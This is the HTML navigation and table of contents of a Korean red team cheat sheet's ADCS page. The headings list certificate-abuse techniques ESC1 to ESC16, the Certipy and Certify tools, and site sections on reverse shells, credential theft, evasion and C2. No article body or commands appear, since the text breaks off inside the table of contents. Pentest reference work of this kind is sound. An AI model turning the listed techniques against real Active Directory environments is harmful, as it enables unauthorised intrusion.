
<!doctype html>
<html lang="ko" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="사내 레드팀/펜테스팅 업무용 치트시트">
      
      
      
      
        <link rel="prev" href="../ad-environment/">
      
      
        <link rel="next" href="../../web/">
      
      
        
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.6">
    
    
      
        <title>ADCS - Red Team Cheat Sheet</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.484c7ddc.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="red" data-md-color-accent="deep-orange">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#adcs" class="md-skip">
          콘텐츠로 이동
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="상단/헤더">
    <a href="../.." title="Red Team Cheat Sheet" class="md-header__button md-logo" aria-label="Red Team Cheat Sheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Red Team Cheat Sheet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              ADCS
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="red" data-md-color-accent="deep-orange"  aria-label="Light mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Light mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="red" data-md-color-accent="deep-orange"  aria-label="Dark mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Dark mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="검색" placeholder="검색" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="검색">
        
        <button type="reset" class="md-search__icon md-icon" title="지우기" aria-label="지우기" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            검색 초기화
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="탭" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../.." class="md-tabs__link">
        
  
  
    
  
  개요

      </a>
    </li>
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../lifecycle/reconnaissance/" class="md-tabs__link">
          
  
  
  공격 라이프사이클

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../protocols/" class="md-tabs__link">
          
  
  
  프로토콜별 펜테스트

        </a>
      </li>
    
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../ad-environment/" class="md-tabs__link">
          
  
  
  Active Directory

        </a>
      </li>
    
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../web/" class="md-tabs__link">
        
  
  
    
  
  Web 공격

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../cloud/" class="md-tabs__link">
        
  
  
    
  
  Cloud 공격

      </a>
    </li>
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../evasion/" class="md-tabs__link">
        
  
  
    
  
  방어 우회

      </a>
    </li>
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../infra/" class="md-tabs__link">
          
  
  
  오퍼레이션 인프라

        </a>
      </li>
    
  

      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../../tools/" class="md-tabs__link">
        
  
  
    
  
  도구 레퍼런스

      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="네비게이션" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Red Team Cheat Sheet" class="md-nav__button md-logo" aria-label="Red Team Cheat Sheet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Red Team Cheat Sheet
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    개요
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    공격 라이프사이클
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            
  
    공격 라이프사이클
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/reconnaissance/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    외부 정찰
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/initial-access/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    초기 침투
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/enumeration/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    내부 정찰 및 열거
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/credential-access/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    자격 증명 탈취
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/privilege-escalation/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    권한 상승
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/lateral-movement/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    횡적 이동
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../lifecycle/persistence/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    지속성 유지
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    프로토콜별 펜테스트
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            
  
    프로토콜별 펜테스트
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    개요
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/smb/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    SMB
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/ldap/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    LDAP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/http/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    HTTP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/winrm/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    WinRM
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/ssh/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    SSH
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/ftp/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    FTP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/rdp/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    RDP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/dns/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    DNS
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/kerberos/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Kerberos
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/rpc/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    RPC
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/mssql/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    MSSQL
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/mysql/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    MySQL
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/snmp/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    SNMP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/nfs/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    NFS
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../protocols/smtp/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    SMTP
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" checked>
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    
  
    Active Directory
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            
  
    Active Directory
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../ad-environment/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    AD 환경 공격
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    
  
    ADCS
  

    
  </span>
  
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    
  
    ADCS
  

    
  </span>
  
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="목차">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      목차
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        기본 개념
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="기본 개념">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#pki" class="md-nav__link">
    <span class="md-ellipsis">
      
        PKI 구성 요소
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        인증서 기반 인증
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#adcs_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        ADCS 존재 확인
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        주요 템플릿 속성
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        취약점 탐색
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc1" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC1: 잘못 구성된 인증서 템플릿
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc2-any-purpose-eku" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC2: Any Purpose EKU
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc3-enrollment-agent" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC3: Enrollment Agent 템플릿
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc4-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC4: 취약한 템플릿 ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc5-pki-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC5: 취약한 PKI 객체 ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc6-editf_attributesubjectaltname2" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc7-ca-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC7: 취약한 CA ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc8-ntlm-relay-to-adcs-http-enrollment" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC8: NTLM Relay to ADCS HTTP Enrollment
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc11-if_enforceencrypticertrequest" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC11: IF_ENFORCEENCRYPTICERTREQUEST
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc12-ca-shell-access-dcom" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC12: CA Shell Access / DCOM
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc13-issuance-policy-linked-group" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC13: Issuance Policy Linked Group
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc14-explicit-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC14: 약한 Explicit Mapping
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#certify-windows" class="md-nav__link">
    <span class="md-ellipsis">
      
        Certify (Windows)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc9-no-security-extension" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC9: No Security Extension
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc10" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC10: 약한 인증서 매핑
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc15-version-1-application-policies-cve-2024-49019" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC15: Version 1 템플릿 Application Policies (CVE-2024-49019)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc16-ca-security-extension" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC16: CA Security Extension 제거
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#certipy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Certipy 주요 명령어
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC 요약
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../web/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Web 공격
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../cloud/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Cloud 공격
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../evasion/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    방어 우회
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
        
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_8" >
        
          
          <label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    오퍼레이션 인프라
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_8">
            <span class="md-nav__icon md-icon"></span>
            
  
    오퍼레이션 인프라
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../infra/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    개요
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../infra/shells/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    리버스 쉘
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../infra/file-transfer/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    파일 전송
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../infra/pivoting/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    피봇 / 터널링
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../infra/c2/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    C2 프레임워크
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../tools/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    도구 레퍼런스
  

    
  </span>
  
  

      </a>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="목차">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      목차
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        기본 개념
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="기본 개념">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#pki" class="md-nav__link">
    <span class="md-ellipsis">
      
        PKI 구성 요소
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        인증서 기반 인증
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#adcs_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        ADCS 존재 확인
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_3" class="md-nav__link">
    <span class="md-ellipsis">
      
        주요 템플릿 속성
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_4" class="md-nav__link">
    <span class="md-ellipsis">
      
        취약점 탐색
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc1" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC1: 잘못 구성된 인증서 템플릿
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc2-any-purpose-eku" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC2: Any Purpose EKU
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc3-enrollment-agent" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC3: Enrollment Agent 템플릿
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc4-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC4: 취약한 템플릿 ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc5-pki-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC5: 취약한 PKI 객체 ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc6-editf_attributesubjectaltname2" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc7-ca-acl" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC7: 취약한 CA ACL
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc8-ntlm-relay-to-adcs-http-enrollment" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC8: NTLM Relay to ADCS HTTP Enrollment
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc11-if_enforceencrypticertrequest" class="md-nav__link">
    <span class="md-ellipsis">
      
        ESC11: IF_ENFORCEENCRYPTICERTREQUEST
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#esc12-ca-shell-access-dcom" class="md-nav__link">
